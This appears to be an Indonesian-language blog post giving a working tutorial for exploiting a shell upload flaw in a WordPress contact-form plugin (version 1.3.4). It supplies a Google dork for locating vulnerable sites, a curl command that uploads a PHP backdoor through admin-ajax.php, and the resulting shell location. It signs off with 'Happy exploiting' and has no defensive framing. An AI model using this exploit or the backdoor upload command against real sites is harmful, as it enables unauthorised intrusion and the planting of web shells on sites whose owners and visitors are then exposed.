Now Trending:
Home
Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

April 14, 2015 WordPress Exploit 1 Comment

Oke lama ya tidak membahas exploit web . Hehehe. barusan buka 1337day dan kebetulan ada exploit yang baru dirilis. Nama nya Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability . Langsung saja ke tutorial ya :
Google Dorks :
intitle: index of /uploads/contact_files/
– use your brain, bitch !

Shell location :
http://victim/wp-content/uploads/contact_files/backdoor.php
Tested on :
BackBox Linux

Anggap sudah meneumuakn target.
Sekarang masuk terminal linux.
[email protected] ~ % mkdir exp
[email protected] ~ % cd exp

Kita membuat folder exp dan masuk ke direktori tersebut .
Lalu kita masukkan backdoor kita disitu.
Misalkan saya membuat backdoor x.php di folder exp tadi.
Lalu masukkan command berikut :
curl -k -X POST -F “action=upload” -F “[email protected]/[backdoor.php]” -F “action=nm_webcontact_upload_file” http://target/wp-admin/admin-ajax.php
Contoh :
Disana tertulis :
{“status”:”uploaded”,”filename”:”1428981565-x.php“}%
Maka shell akan berada di :
http://localhost/bugs/wp-content/uploads/contact_files/1428981565-x.php

Sekian dan semoga bermanfaat .
Happy exploiting 🙂

Shares

Related Posts

About The Author

Yoo Cherry

sysadmin / blogger / geek / ubuntu user

Tags:, , , ,

One Response

  1. Trio Gempar Surya Giri March 12, 2017 Reply

    (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k) (k)

Leave a Reply